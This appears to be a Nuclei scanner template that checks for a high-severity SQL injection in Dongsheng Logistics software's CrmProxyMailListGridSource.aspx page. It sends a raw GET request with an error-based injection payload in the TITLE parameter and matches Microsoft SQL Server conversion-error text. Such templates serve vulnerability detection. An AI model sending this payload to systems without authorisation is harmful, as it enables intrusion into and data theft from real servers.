id: dongshengwuliu-CrmProxyMailListGridSource-sql

info:
  name: 东胜物流软件 CrmProxyMailListGridSource.aspx 存在SQL注入漏洞
  author: dongshengwuliu
  severity: high
  tags: dongshengwuliu

http:
  - raw:
      - |+
        GET /PriceCarrier/CrmProxyMailListGridSource.aspx?handle=list&cur_page=1&show_page=10&TITLE=a'+and+1<@@VERSION--+- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'nvarchar'
          - 'Microsoft SQL Server'
          - '转换成数据类型'
        condition: and
